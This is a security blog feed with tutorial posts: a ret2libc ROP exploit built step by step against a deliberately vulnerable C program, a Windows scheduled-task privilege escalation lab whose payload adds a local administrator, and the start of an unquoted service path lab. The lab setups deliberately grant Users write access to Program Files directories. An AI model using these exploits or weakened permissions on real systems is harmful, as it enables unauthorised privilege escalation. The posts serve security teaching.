We went backstage with IIS and application pools, kind of like peeking behind the curtain at a tech concert. Setting up our lab was like creating the perfect stage for our exploits – hands-on and real.

JuicyPotato stole the spotlight in our demo, showing that ethics is our treasure map, and talking to clients is our secret weapon.

Here, we&apos;re the good cyber-pirates – ethical and communicative, no nasty surprises. Tools like `wes.py` are our magical compasses, helping us navigate this vast cyber-sea.

In a nutshell, we explored the art of Windows privilege escalation like true cyber-adventurers! Until the next treasure hunt! 🏴‍☠️💻

# Resources

[SeImpersonatePrivilege – Windows Privilege Escalation](https://juggernaut-sec.com/seimpersonateprivilege/)</content:encoded><author>Ruben Santos</author></item><item><title>ROP Magic: Exploiting Linux Binaries with ret2libc</title><link>https://www.kayssel.com/post/ret2libc</link><guid isPermaLink="true">https://www.kayssel.com/post/ret2libc</guid><description>Discover the art of ROP in binary exploitation. From buffer overflows to crafting a &quot;/bin/sh&quot; execution using libc gadgets, this article provides insights into bypassing security measures and mastering exploit development with practical examples.</description><pubDate>Sun, 24 Dec 2023 11:53:42 GMT</pubDate><content:encoded># Introduction

Welcome to a captivating journey into the world of Linux binary exploitation! Today, we dive into the sophisticated realm of Return Oriented Programming (ROP), an essential technique for any budding cybersecurity enthusiast. We&apos;ll tackle the intriguing variant of ret2libc, taking you step-by-step through the process of building a practical exploit. Whether you&apos;re a seasoned pro or a curious newcomer, prepare to gain valuable insights into the art of turning vulnerabilities into powerful tools. Let&apos;s embark on this adventure and unlock the secrets of ROP together!

# **Elevating the Level: Unpacking execstack and Its Implications**

Up until now, all the binaries we&apos;ve crafted were compiled with a set of specific options that deliberately relaxed several protections to make exploitation easier:

```bash
gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o vulnerable vulnerable.c
```

Many of these options deliberately disable exploitation safeguards. Today, I want to zero in on one in particular: `-z execstack`. This flag marks the stack as executable, disabling the NX (non-executable stack) protection; it&apos;s what allowed the shellcode we placed on the stack in earlier chapters to actually run. From now on we&apos;ll compile *without* it, so NX stays active: we can still write shellcode onto the stack, but the processor will refuse to execute it. However, there&apos;s no need for alarm. In the realm of cybersecurity, every implemented &quot;patch&quot; soon meets a clever workaround. This is precisely where Return Oriented Programming (ROP) comes into play, emerging as a response to this new limitation in exploit development. But what exactly is ROP, and how does it function?

# **Decoding ROP: The Art of Return Oriented Programming**

Return Oriented Programming (ROP) comes into play when a buffer overflow allows an attacker to overwrite a program&apos;s call stack with malicious data, thereby manipulating its execution. Unlike traditional methods that inject new shellcode, ROP cleverly utilizes existing code segments within the program, known as &quot;gadgets,&quot; which conclude with a &apos;ret&apos; (return) instruction.

These gadgets are essentially short instruction sequences tailored to perform specific tasks, each culminating in a &apos;ret&apos; instruction. This setup enables the attacker to string together multiple gadgets, forming a controlled execution path. By crafting a chain of these gadgets on the call stack, the final &apos;ret&apos; instruction deftly redirects execution to the next return address specified by the attacker.

ROP&apos;s versatility stems from its ability to harness code from any part of the binary granted execution permissions. In this article, we&apos;ll focus on employing executable code (gadgets) specifically from libc, a strategy known as ret2libc. This approach enjoys widespread popularity due to libc&apos;s status as the quintessential C library, embedded in almost all C language programs.

&lt;details&gt;
&lt;summary&gt;Consider the following simple C code snippet:&lt;/summary&gt;

```c
#include &lt;stdio.h&gt; // by including stdio.h we are already linking against libc

int main() {
    printf(&quot;Hello, world!\n&quot;);
    return 0;
}


```
&lt;/details&gt;


While ROP might initially appear daunting, we will demystify it by developing an exploit using vulnerable code, offering a clearer understanding of this sophisticated technique.

# **Vulnerable Code: The Gateway to ROP Exploitation**

To demonstrate the Return Oriented Programming (ROP) technique, let&apos;s examine a piece of code that is inherently vulnerable:

```c
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
#include &lt;stdlib.h&gt;


int main(int argc, char *argv[]){
	char name[200];
	strcpy(name, argv[1]);
	printf(&quot;Hii %s\n&quot;, name);
	return 0;
}

```

This straightforward code does three things: it reads the input from the first argument, copies it to the variable `name`, and then prints it out. As we&apos;ve explored in previous chapters, the use of `strcpy` without controlling the number of characters leads to a potential buffer overflow. This vulnerability can be exploited to manipulate the execution of the binary. For our purpose, we&apos;ll compile the program without stack canaries, but this time also without `-z execstack`, so the stack is non-executable and we must rely on ROP rather than injected shellcode:

```bash
gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -o vulnerable vulnerable.c

```

This setup creates an ideal environment to demonstrate how ROP can be effectively implemented, despite the inherent security mechanisms designed to prevent such exploits.

# **Crafting the Attack Strategy: Buffer Overflow Meets ROP**

To construct our exploit, we&apos;ll employ a fusion of buffer overflow and Return Oriented Programming (ROP) techniques to execute a shell. The process unfolds in several strategic steps:

1.  **Buffer Overflow Initiation**: We&apos;ll commence by causing a buffer overflow. The primary objective here is to overwrite the return address in the stack. Our endgame? To replace it with the memory address of our first chosen gadget.
2.  **Determining the Offset**: Once we&apos;ve established the correct offset needed to induce the buffer overflow and successfully overwritten the return address, we&apos;ll turn our attention to examining the range of memory addresses that libc loads. This step is crucial for identifying the starting point of our ROP chain.
3.  **Gadget Hunting in libc**: The next phase involves scouring libc for potential gadgets to orchestrate a ret2libc type attack, as discussed earlier. These gadgets must be capable of executing the `execve` system call, thereby enabling us to run a &quot;/bin/sh&quot; command.
4.  **Synthesizing the Exploit**: With all the necessary components at hand - the buffer overflow offset, return address, and suitable gadgets - we&apos;ll piece together our exploit.

**Visualizing the Attack**:

Here&apos;s a high-level diagram to illustrate the attack strategy. Remember, as we&apos;ve learned from [previous experiences](https://www.kayssel.com/post/format-string-and-buffer-overflow/), the actual compiler behavior might deviate from our theoretical understanding. Hence, this diagram serves as a fundamental representation, guiding us through the attack&apos;s architecture.

![](/content/images/2023/12/image-59.png)

Attack diagram

# **Initiating Exploit Development: Analyzing the Binary with Radare**

The first step in our exploit development involves a detailed analysis of the binary. For this purpose, we&apos;ll utilize radare, a powerful reverse-engineering tool. Our objective here is to load the binary and dissect it to unearth all available symbols, providing us with vital insights into its structure.

&lt;details&gt;
&lt;summary&gt;We begin with the following command to load the binary into radare and perform an initial analysis:&lt;/summary&gt;

```bash
r2 -A -d vulnerable

```
&lt;/details&gt;


This command initializes radare with the binary &apos;vulnerable&apos;, automatically analyzing it and entering debug mode. Once loaded, our next focus is the `main` function, which is often the starting point for understanding a program&apos;s execution flow. To examine the `main` function in detail, we use:

```bash
pdf @dbg.main

```

This command (`pdf`) prints the disassembled function located at the `main` symbol in the debugging context. It&apos;s crucial to remember that if we need to list all functions within the binary, the command `afl` (analyze functions list) can be employed. This step sets the stage for identifying key areas of interest within the binary, essential for crafting our exploit.

# **Buffer Overflow: Crafting and Analyzing the Exploit**

As we delve into our exploit development, our initial analysis reveals that the compiler has introduced more variables than anticipated. This unexpected discovery necessitates a slight modification of our strategy.

## **Understanding the Variables**

-   **var\_cch**: This variable aligns with the &quot;name&quot; variable from our original code and is our primary target for the buffer overflow.
-   **Additional Variables**: The compiler has added &quot;name&quot; and &quot;var\_4h&quot;. Of these, &quot;var\_4h&quot; is crucial for our exploit. According to our initial plan, the offset for overwriting the return address was calculated to be 204 bytes (200 for `var_cch` or `name` and 4 for `ebp`). However, the presence of `var_4h` means we need to adjust our payload by adding 4 more bytes. The variable &quot;name,&quot; located at an offset of 196 (or 0xC4 in hexadecimal), is not a concern as it falls within the 200-byte range we are already overwriting.
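The offset arithmetic above is easy to sanity-check before writing the payload (sizes taken from the analysis: 200 bytes for `var_cch`, 4 for `var_4h`, 4 for the saved `ebp`):

```python
# Padding sizes derived from the radare2 analysis above.
VAR_CCH   = 200  # the "name" buffer from the source code
VAR_4H    = 4    # extra variable inserted by the compiler
SAVED_EBP = 4    # saved base pointer

offset_to_ret = VAR_CCH + VAR_4H + SAVED_EBP
print(offset_to_ret)  # → 208 bytes of padding before the return address
assert offset_to_ret == 208
```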

![](/content/images/2023/12/image-58.png)

Variables

![](/content/images/2023/12/image-75.png)

New stack after changes

## **Developing the Buffer Overflow Exploit**

With this insight, we can craft our buffer overflow exploit:

```python
import sys
 
payload = b&quot;A&quot;*200 # var_cch = name
payload +=b&quot;B&quot;*4 # var_4h
payload += b&quot;C&quot;*4 # ebp
# the following 4 characters will correspond to the return address
sys.stdout.buffer.write(payload)

```

## **Executing and Analyzing the Exploit in Radare**

Running this exploit in radare, positioned just before the `strcpy` execution, allows us to observe the memory addresses of these variables. We&apos;re particularly interested in `var_cch` for further analysis. To execute the exploit, use the command:

```bash
ood &quot;`!python3 exploit.py`&quot;

```

![](/content/images/2023/12/image-76.png)

Current positioning

![](/content/images/2023/12/image-54.png)

Values before strcpy

Positioning ourselves after `strcpy`, we can see how `var_cch` encompasses our entire payload.

![](/content/images/2023/12/image-62.png)

Current positioning

![](/content/images/2023/12/image-55.png)

Payload in variable &quot;var\_cch&quot;

Further memory inspection (using the command `pd 208`) reveals that our payload also occupies `var_4h` (shown as &quot;B&quot; or 42 in hexadecimal) and `ebp` (&quot;C&quot; or 43 in hexadecimal). The subsequent four bytes are where we&apos;ll direct the return address.

![](/content/images/2023/12/image-60.png)

## **Refining the Exploit**

&lt;details&gt;
&lt;summary&gt;A slight modification to our exploit helps us better understand the control we have gained:&lt;/summary&gt;

```python
import sys

payload = b&quot;A&quot;*200 # var_cch = name
payload += b&quot;B&quot;*4 # var_4h
payload += b&quot;C&quot;*4 # ebp
payload += b&quot;D&quot;*4 # return addr
sys.stdout.buffer.write(payload)
```
&lt;/details&gt;


When we run this updated version and position ourselves after the return address, we can confirm the successful overwrite, with the execution flow directed towards the address `0x44444444`. This demonstrates our effective control over the program&apos;s execution flow, setting the stage for the next phase of our exploit development.

![](/content/images/2023/12/image-63.png)

We managed to change the return address

![](/content/images/2023/12/image-64.png)

Flow control successfully completed!

## **Obtaining libc Addressing for ROP Chain**

After successfully achieving a buffer overflow, our next objective is to locate the address of libc. This step is essential for determining the positions of our ROP gadgets. Radare2 offers a straightforward command for this purpose:

```bash
dm

```

![](/content/images/2023/12/image-65.png)

Memory space with execution permission

This command lists the memory maps of the process, including several segments of libc (like `/usr/lib32/libc.so.6`) with different permissions. Among these, our focus is on the segment with execute permission: its base address is the starting point from which we&apos;ll calculate the positions of our gadgets.

Let&apos;s incorporate this newfound knowledge into our exploit code:

```python
import sys

# Base address of the libc segment with execute permission (from &quot;dm&quot;)
libc_base_addr = 0xf7c00000

# Payload so far; libc_base_addr will anchor the gadget addresses in the next step
payload = b&quot;A&quot;*200  # Overflowing var_cch (name)
payload += b&quot;B&quot;*4   # Accounting for var_4h
payload += b&quot;C&quot;*4   # Overwriting ebp
payload += b&quot;D&quot;*4   # Placeholder for the return address to be controlled
sys.stdout.buffer.write(payload)

```

# **Identifying and Implementing ROP Gadgets**

To build a successful Return Oriented Programming (ROP) chain for our exploit, the selection of the right gadgets is crucial. Our approach can be divided into several key steps:

## **Defining Execution Strategy:**

We can execute code either by using system calls (similar to our previous shellcode exploits) or by leveraging existing libc functions like `execv` or `system`.

In this case, we opt for the first method, aiming to execute `execve` via gadgets. Our target is to run a simple &quot;/bin/sh&quot; command, focusing primarily on manipulating the `ebx` and `eax` registers and searching for the &quot;int 0x80&quot; instruction.
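Concretely, the register state and stack layout we are working toward can be sketched as follows (descriptive placeholders, not real gadget addresses):

```python
# Register contract for execve via "int 0x80" on 32-bit Linux:
#   eax = 11            syscall number for execve
#   ebx = address of the "/bin/sh" string
#   ecx = 0, edx = 0    argv / envp (NULL is accepted here)
EXECVE_SYSCALL_NO = 11

# Order of the ROP chain placed after the overwritten return address:
chain = [
    "pop ebx; ret",        # 1. pops the next stack value into ebx...
    "address of /bin/sh",  # 2. ...which is the string address inside libc
    "int 0x80",            # 3. fires the syscall once eax holds 11
]
assert EXECVE_SYSCALL_NO == 11
print(chain)
```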

![](/content/images/2023/12/image-66.png)

Call execve

## **Searching for Gadgets**

For efficient gadget hunting, &quot;ROPgadget&quot; is an invaluable tool. Alternatively, Radare&apos;s &quot;/R&quot; command can be used, but ROPgadget typically offers quicker results.

[GitHub - JonathanSalwan/ROPgadget: This tool lets you search your gadgets on your binaries to facilitate your ROP exploitation. ROPgadget supports ELF, PE and Mach-O format on x86, x64, ARM, ARM64, PowerPC, SPARC, MIPS, RISC-V 64, and RISC-V Compressed architectures.](https://github.com/JonathanSalwan/ROPgadget)

We start by searching for the &quot;int 0x80&quot; instruction using ROPgadget:

```bash
ROPgadget --binary /usr/lib32/libc.so.6 --only &quot;int&quot;

```

![](/content/images/2023/12/image-67.png)

We find int 0x80

Among the results, we select the appropriate gadget for syscall execution.

## **Constructing the ROP Chain:**

With the crucial &quot;int 0x80&quot; gadget identified, we integrate it into our exploit:

```python
import sys
from pwn import *


libc_base_addr = 0xf7c00000
int_080 = libc_base_addr + 0x000375a5

payload = b&quot;A&quot;*200 # var_cch = name
payload +=b&quot;B&quot;*4 # var_4h
payload += b&quot;C&quot;*4 # ebp

#ROP
payload += p32(int_080)

sys.stdout.buffer.write(payload)

```
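The `p32` helper from pwntools packs an address into four little-endian bytes. A standard-library equivalent, using `int.to_bytes`, makes the byte order explicit:

```python
def p32_equiv(addr: int) -> bytes:
    # Pack a 32-bit address little-endian, as pwntools' p32 does.
    return addr.to_bytes(4, "little")

# 0x44444444 is the "DDDD" marker used earlier to confirm control of the
# return address.
assert p32_equiv(0x44444444) == b"DDDD"

# The int 0x80 gadget address (0xf7c00000 + 0x375a5) as it lands on the stack:
print(p32_equiv(0xf7c375a5).hex())  # → a575c3f7
```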

Running this payload positions us at our chosen gadget post-return from the main function.

![](/content/images/2023/12/image-68.png)

Positioning in our gadget after returning from main

## **Placing &quot;/bin/sh&quot; in ebx:**

There are two ways to achieve this: either by placing the characters directly on the stack or by locating the string in libc. We opt for the latter:

```bash
strings -a -t x /usr/lib32/libc.so.6 | grep /bin/sh

```
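The same search can be reproduced in Python. The snippet below runs against a small synthetic blob so it is self-contained; on a real system you would read `/usr/lib32/libc.so.6`, and the resulting offset (0x1b90d5 on the author&apos;s libc) differs per build:

```python
# Locate a NUL-terminated string inside a binary blob, mirroring
# `strings -a -t x libc.so.6 | grep /bin/sh`. The blob here is synthetic.
blob = b"\x00" * 64 + b"/bin/sh\x00" + b"\x00" * 32

offset = blob.find(b"/bin/sh\x00")
print(hex(offset))  # → 0x40

# libc_base + offset is the absolute address the ROP chain loads into ebx.
libc_base = 0xf7c00000  # base address reported by `dm` in radare2
print(hex(libc_base + offset))  # → 0xf7c00040
```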

![](/content/images/2023/12/image-69.png)

Find the string &quot;/bin/sh&quot;

To correctly place the memory address of &apos;/bin/sh&apos; in the ebx register, we use a &apos;pop&apos; gadget. The &apos;pop ebx&apos; instruction takes the next value from the stack and loads it into ebx; in our case, that value will be the address of &apos;/bin/sh&apos;. We can find a suitable gadget with ROPgadget as follows:

```bash
ROPgadget --binary /usr/lib32/libc.so.6 --only &quot;pop|ret&quot;

```

![](/content/images/2023/12/image-70.png)

Find the pop instruction

# **Finalizing the Exploit**

With these adjustments in place, our exploit now looks like this:

```python
import sys
from pwn import *

# Establishing the base address of libc and the necessary gadgets
libc_base_addr = 0xf7c00000
int_080 = libc_base_addr + 0x000375a5
pop_ebx = libc_base_addr + 0x2bf5f
bin_sh_addr = libc_base_addr + 0x1b90d5

# Constructing the payload
payload = b&quot;A&quot;*200  # Overflowing var_cch (name)
payload += b&quot;B&quot;*4   # Accounting for var_4h
payload += b&quot;C&quot;*4   # Overwriting ebp

# Assembling the ROP chain
payload += p32(pop_ebx) 
payload += p32(bin_sh_addr)
payload += p32(int_080)

sys.stdout.buffer.write(payload)
```

Upon analysis, we can observe how the payload loads the address of the string into ebx. The gadget&apos;s &apos;ret&apos; then hands control to &apos;int 0x80&apos;, which triggers the system call.

![](/content/images/2023/12/image-71.png)

pop ebx execution

![](/content/images/2023/12/image-72.png)

/bin/sh in hexadecimal

The final step involves setting the value 11 in eax, which the &apos;execve&apos; system call requires. Although I&apos;ve used &apos;add&apos; instructions here, alternatives built from &apos;mov&apos; or &apos;sub&apos; gadgets are also viable. To locate a suitable instruction, we can use ROPgadget:

```bash
ROPgadget --binary /usr/lib32/libc.so.6 --only &quot;add|ret&quot; | grep &quot;eax&quot;

```

![](/content/images/2023/12/image-73.png)

Instructions for setting the eax register

This approach leaves eax with the value 11, matching the &apos;execve&apos; call. Here&apos;s the complete exploit with all components aligned:

```python
import sys
from pwn import *

# [Previous code for setting up libc_base_addr and gadgets]

mov_9 = libc_base_addr + 0x00191d90
mov_2 = libc_base_addr + 0x000c8c27

# Finalizing the ROP chain
payload += p32(mov_9) 
payload += p32(mov_2) 
payload += p32(pop_ebx) 
payload += p32(bin_sh_addr)
payload += p32(int_080)

sys.stdout.buffer.write(payload)
```
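To see why the chain above leaves eax at 11: reading the gadget names (`mov_9`, `mov_2`) as &quot;set eax to 9&quot; followed by &quot;add 2 to eax&quot; (an assumption inferred from the names, as the exact disassembly only appears in the screenshot), the arithmetic matches the execve syscall number:

```python
eax = 9        # first gadget: assumed to leave eax at 9
eax = eax + 2  # second gadget: assumed to add 2 to eax
assert eax == 11  # syscall number for execve on 32-bit Linux
print(eax)
```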

Executing this exploit and inspecting the stack reveals that our gadgets are perfectly aligned to execute &quot;/bin/sh&quot;, achieving the desired command execution.

![](/content/images/2023/12/image-78.png)

![](/content/images/2023/12/image-74.png)

We successfully achieved a shell

# Conclusions

As we wrap up our exploration of Return Oriented Programming (ROP) in the realm of Linux binary exploitation, it&apos;s clear that this technique stands as a cornerstone in the world of cybersecurity. Our journey through crafting a ret2libc exploit not only sheds light on the intricacies of ROP but also demonstrates its vital role in understanding and overcoming modern security defenses. This adventure has equipped you with the knowledge to approach binary vulnerabilities with confidence and creativity, paving the way for further exploration and mastery in the ever-evolving landscape of cybersecurity.

# Resources

[Ataque return to libc · Guía de exploits](https://fundacion-sadosky.github.io/guia-escritura-exploits/esoteric/6-ret2libc.html)</content:encoded><author>Ruben Santos</author></item><item><title>Time to Rise: Privilege Escalation Chronicles – Unveiling Windows Scheduled Task Exploits</title><link>https://www.kayssel.com/post/task-scheduler</link><guid isPermaLink="true">https://www.kayssel.com/post/task-scheduler</guid><description>Explore how misconfigured Windows scheduled tasks can lead to privilege escalation. Learn to set up a lab, identify vulnerabilities, and execute an attack for comprehensive understanding.</description><pubDate>Sun, 17 Dec 2023 19:10:36 GMT</pubDate><content:encoded># **Introduction: Navigating the Realm of Scheduled Tasks for Privilege Escalation**

In our ongoing exploration of Windows privilege escalation techniques, today&apos;s chapter delves into a technique centered around the misconfiguration of scheduled tasks. Similar in concept to Cron jobs on Linux, this approach is a prevalent method for gaining elevated access in Windows environments. We&apos;ll start with a high-level overview of the Windows Task Scheduler and its vulnerability exploitation. Following this, we&apos;ll guide you through creating a lab for hands-on practice, culminating in a proof-of-concept (POC) demonstration of privilege escalation using this technique.

# **Task Scheduler: The Gateway to Privilege Escalation**

The Windows Task Scheduler is a vital tool, enabling users to automate tasks such as program launches, script executions, and routine operations. It&apos;s particularly helpful for automating repetitive tasks like backups and scheduled updates. However, the scheduler&apos;s true potential and pitfalls lie in its configuration, especially regarding the binary paths it executes. These paths, if improperly configured, can become a vector for privilege escalation.

![](/content/images/2023/12/image-41.png)

Diagram of the attack

# **Lab Setup: Creating the Perfect Environment for Practice**

To begin our practical exploration, we&apos;ll create a directory to house our executable binary. This directory will be intentionally misconfigured to allow all &apos;Users&apos; group members to create or modify files, mimicking a common administrative oversight. This setup is crucial for practicing the escalation technique:

```powershell
mkdir &quot;C:\Program Files\Kayssel Archive\Task&quot;
New-Item -Path &quot;C:\Program Files\Kayssel Archive\Task&quot; -Name file.exe
icacls &quot;C:\Program Files\Kayssel Archive\Task&quot; /grant &quot;Users:(OI)(CI)W&quot;

```
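From the attacker&apos;s side, the equivalent question is simply: can the current user write to the task&apos;s directory? A Python sketch of that check follows, run against a throwaway temp directory here so it is self-contained; on the target you would point it at the task&apos;s binary path:

```python
import os
import tempfile

def is_writable(path: str) -> bool:
    # Mirrors the misconfiguration check: can the current user write here?
    return os.access(path, os.W_OK)

# Demo against a throwaway directory standing in for
# "C:\Program Files\Kayssel Archive\Task" on the target.
demo_dir = tempfile.mkdtemp()
print(is_writable(demo_dir))  # → True
```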

![](/content/images/2023/12/image-33.png)

Modification so that everyone can write

Once the directory and the binary that the task will execute have been created, we can configure the task itself. In my case, I&apos;ll create it as beruinsect, a domain user. I recommend following this process closely: I&apos;ve tried several alternatives, and deviations can cause problems later when trying to detect the vulnerable task from the account we&apos;ll use to simulate the intrusion.

To initiate, launch the &quot;Task Scheduler&quot; application found via the Windows search bar. Once open, navigate to and select the &quot;Create Task&quot; option. Within the initial setup menu, several key configurations are required:

![](/content/images/2023/12/image-42.png)

Execution of the task schedule

![](/content/images/2023/12/image-44.png)

Create Task

In the first menu, you will select the following options:

**Task Execution Settings:** We&apos;ll set the task to start regardless of the user&apos;s login status. This approach is chosen to allow manual execution of the task for our privilege escalation proof of concept (POC), eliminating the need to wait for automatic triggers. Alternatively, you can select &quot;Run only when user is logged on&quot; to mimic a scenario where the task initiates upon an administrator&apos;s login.

**Assigning Execution Privileges:** Crucially, we&apos;ll assign task execution rights to an administrator. This step is pivotal for potential privilege escalation.

![](/content/images/2023/12/image-45.png)

Options selection

**User Selection for Task Execution:** To specify the executing user, select &quot;Change User&quot; from the provided menu options.

![](/content/images/2023/12/image-26.png)

Domain selection

![](/content/images/2023/12/image-39.png)

Execution as the administrator user

![](/content/images/2023/12/image-46.png)

Final configuration

**Scheduling the Task:** Our task will be set to execute every 5 minutes daily, achieved by adding a new trigger in the scheduler.

![](/content/images/2023/12/image-21.png)

Creation of the new trigger

![](/content/images/2023/12/image-22.png)

Launch every 5 minutes

**Action Configuration:** In the actions tab, choose the binary intended for repeated execution.

![](/content/images/2023/12/image-23.png)

Binary selection

![](/content/images/2023/12/image-24.png)

New action

Once this is done, we should see the task in the scheduler:

![](/content/images/2023/12/image-25.png)

Task created

Upon completing these configurations, the lab environment is fully set up and ready for conducting privilege escalation experiments.

# **Attack Execution: Turning Theory into Practice**

Our primary objective in this phase is to escalate privileges to administrator level on the PC-BERU machine, assuming we have compromised the &apos;beruinsect&apos; user account.

## **Enumerating Scheduled Tasks**

To identify potential targets for escalation, we can start with manual enumeration through the Windows command line. Key information to focus on includes the execution path of the binary and its associated privileges, especially tasks running under administrative rights.

&lt;details&gt;
&lt;summary&gt;Utilize the following PowerShell command to list detailed task information:&lt;/summary&gt;

```powershell
schtasks /query /fo LIST /v

```
&lt;/details&gt;


![](/content/images/2023/12/image-47.png)

Obtaining task information

For more targeted results, filter tasks by name and privilege level:

```powershell
schtasks /query /fo LIST /v | Select-String -Pattern &quot;TaskName&quot;,&quot;Run As User&quot;

```
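Manual filtering works, but the LIST output also parses cleanly. A sketch against a hard-coded sample follows; the field names assume English-locale `schtasks` output, and the task name shown is a hypothetical stand-in for the one created in the lab:

```python
# Parse `schtasks /query /fo LIST /v` output and keep tasks that run as a
# privileged user. The sample is hard-coded so the snippet is self-contained;
# in practice, feed it real schtasks output via subprocess.
SAMPLE = """\
TaskName:      \\KaysselTask
Run As User:   DOMAIN\\Administrator

TaskName:      \\UserTask
Run As User:   beruinsect
"""

def privileged_tasks(listing: str) -> list[str]:
    hits, current = [], None
    for line in listing.splitlines():
        if line.startswith("TaskName:"):
            current = line.split(":", 1)[1].strip()
        elif line.startswith("Run As User:"):
            user = line.split(":", 1)[1].strip()
            if "administrator" in user.lower() or user.upper() == "SYSTEM":
                hits.append(current)
    return hits

print(privileged_tasks(SAMPLE))  # → ['\\KaysselTask']
```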

![](/content/images/2023/12/image-28.png)

&lt;details&gt;
&lt;summary&gt;Identifying the task name&lt;/summary&gt;

```powershell
schtasks /query /fo LIST /v  | where-object {$_ -match &quot;TaskName&quot; -or $_ -match &quot;Run As User&quot;}

```
&lt;/details&gt;


![](/content/images/2023/12/image-48.png)

Name of the task and privileges over which it runs

Additionally, as in previous chapters, Winpeas can be employed for a more automated detection of vulnerable tasks:

```powershell
.\winpeas | tee win_report.txt

```

![](/content/images/2023/12/image-32.png)

Detection of the vulnerable task with Winpeas

## **Modifying the Binary for Escalation**

Upon identifying a vulnerable task, the next step involves modifying the binary executed by the task. For demonstration, here&apos;s a simple C program designed to add a user with administrative privileges:

```c
#include &lt;stdlib.h&gt;

int main() {
  system(&quot;net user rsgbengi Password123 /add&quot;);
  system(&quot;net localgroup administrators rsgbengi /add&quot;);
  return 0;
}


```

&lt;details&gt;
&lt;summary&gt;Compile this program using:&lt;/summary&gt;

```bash
x86_64-w64-mingw32-gcc-win32 vuln.c -o vuln.exe

```
&lt;/details&gt;


Transfer the compiled binary to the target machine and replace the original task binary, making sure to back up the original file first:

```powershell
cp file.exe file.bak
mv vuln.exe file.exe

```

![](/content/images/2023/12/image-35.png)

Replacing the original file

## **Executing the Modified Task**

If the lab is set up as described, execute the task from the scheduler. For tasks configured to run at user logon, re-login as the administrator.

![](/content/images/2023/12/image-51.png)

Execute the task

Post-execution, verify the creation of a new user in the administrators&apos; group, marking the success of the privilege escalation.

![](/content/images/2023/12/image-34.png)

Before task execution

![](/content/images/2023/12/image-52.png)

After Execution

![](/content/images/2023/12/image-49.png)

Membership of the user rsgbengi in the administrators&apos; group

# **Conclusion: Mastering Scheduled Task Exploitation**

In this chapter, we navigated through the intricate process of exploiting scheduled task misconfigurations for privilege escalation on Windows. From understanding the basics of the Windows Task Scheduler to setting up a practical lab and executing a successful attack, we covered essential steps in identifying and exploiting this common vulnerability. This exploration not only equips you with a valuable skill in your cybersecurity toolkit but also deepens your understanding of system vulnerabilities and their implications. As we conclude this chapter, remember that the journey in cybersecurity is one of continuous learning, and each chapter brings new insights and techniques to master.

# Resources

[Windows Privilege Escalation: Scheduled Task/Job (T1573.005) - Hacking Articles](https://www.hackingarticles.in/windows-privilege-escalation-scheduled-task-job-t1573-005/)</content:encoded><author>Ruben Santos</author></item><item><title>Path to Power: Unleashing Windows Privileges through Unquoted Service Paths</title><link>https://www.kayssel.com/post/unquoted-service-path</link><guid isPermaLink="true">https://www.kayssel.com/post/unquoted-service-path</guid><description>Explore Unquoted Service Path, a Windows privilege escalation vulnerability. Learn to set up labs, use detection tools, and execute attacks for hands-on understanding and defense.</description><pubDate>Sun, 10 Dec 2023 16:44:15 GMT</pubDate><content:encoded># **Unveiling Unquoted Service Paths: An Introduction**

Welcome to another insightful exploration in our ongoing series about mastering privilege escalation in Windows environments. Today&apos;s focus is on the intriguing and often underexplored Unquoted Service Path vulnerability. This vulnerability, while common in Windows systems, offers a unique avenue for escalating privileges and understanding the inner workings of Windows service executions. In this chapter, we&apos;re going deeper than just a surface-level understanding. We’ll embark on a comprehensive journey, starting from the basics of what Unquoted Service Path vulnerability is, moving through the nuances of its exploitation, and culminating in the creation of a practical lab environment for hands-on learning.

Our aim is to provide a holistic view of this vulnerability - not just to exploit it, but to truly grasp the why and how behind its existence and usage. Additionally, we&apos;ll cover how to take complete control of services, turning them from mere system operations into powerful tools for system administration and security manipulation. Whether you&apos;re a seasoned security professional or a curious enthusiast, this chapter promises to enhance your skill set and deepen your understanding of Windows security. So, let&apos;s begin this adventure and uncover the secrets of Unquoted Service Path exploitation.

# **Decoding the Vulnerability: What is Unquoted Service Path?**

In the world of Windows operating systems, services are the unsung heroes, running silently in the background to perform a variety of tasks. When a service is installed, it is linked to a specific file path. There&apos;s a catch, though: if that path contains spaces and isn&apos;t wrapped in quotation marks, Windows treats each space as a potential end of the executable path and tries each prefix in turn. This opens a security loophole that attackers can exploit by planting a binary at one of those intermediate paths. Here&apos;s a diagram to visualize the vulnerability:

![](/content/images/2023/12/image-15.png)

Vulnerability diagram

In this diagram, the service binary is &quot;vulnerable.exe&quot;, but due to spaces, Windows perceives multiple paths:

-   C:\\Program
-   C:\\Program Files\\Vuln
-   C:\\Program Files\\Vuln Service\\vulnerable.exe

If we have write access to any of these paths, it becomes a gateway for privilege escalation. For instance, with write permission on &quot;Program Files&quot;, we could create a file named &quot;Vuln.exe&quot; (as the next directory is &quot;Vuln Service&quot;) that would execute upon the service&apos;s launch. This is just the tip of the iceberg, though. To really get a handle on this, let&apos;s set up a lab environment!
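The search behaviour above can be sketched in a few lines of Python — a simplified model (an assumption, not the exact SCM implementation) of how Windows tries each space-delimited prefix, with `.exe` appended, before the full path:

```python
def candidate_paths(image_path):
    # For an unquoted service path, Windows tries every space-delimited
    # prefix as an executable before falling back to the full path.
    parts = image_path.split(' ')
    candidates = [' '.join(parts[:i]) + '.exe' for i in range(1, len(parts))]
    candidates.append(image_path)
    return candidates

for p in candidate_paths(r'C:\Program Files\Vuln Service\vulnerable.exe'):
    print(p)
```

Each printed path that sits in a directory we can write to is a potential planting spot for our binary.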

# **Setting the Stage: Lab Preparation for Attack Simulation**

Let&apos;s start by creating a directory for our service-executed binary. Remember, these steps require administrator-level access:

```powershell
mkdir &quot;C:\Program Files\Kayssel Archive\Vuln Service&quot;

```

Next, we assign write permissions to the Users group for this directory:

```powershell
icacls &quot;C:\Program Files\Kayssel Archive&quot; /grant &quot;Users:(OI)(CI)W&quot;

```

This setup means any user in this group can now create files here, a crucial step for our privilege escalation practice. If we skip this, non-administrator users won&apos;t have the necessary file creation rights.

![](/content/images/2023/12/image-4.png)

Error running the service

Now, we need a program that can run as a service. I&apos;ve used this one from GitHub:

[GitHub - CoreProgramm/Windows-Service-Threading: In this CoreProgramm you find how to create and Install Windows Service using Threading class.](https://github.com/CoreProgramm/Windows-Service-Threading/tree/master)

It&apos;s a simple program that writes the date and time to a file in &quot;C:&quot;. The &quot;WindowsService.exe&quot; found in the repository&apos;s &quot;bin/debug&quot; will be our service binary, renamed as &quot;vulnerable.exe&quot;.

![](/content/images/2023/12/image-13.png)

Service Binary

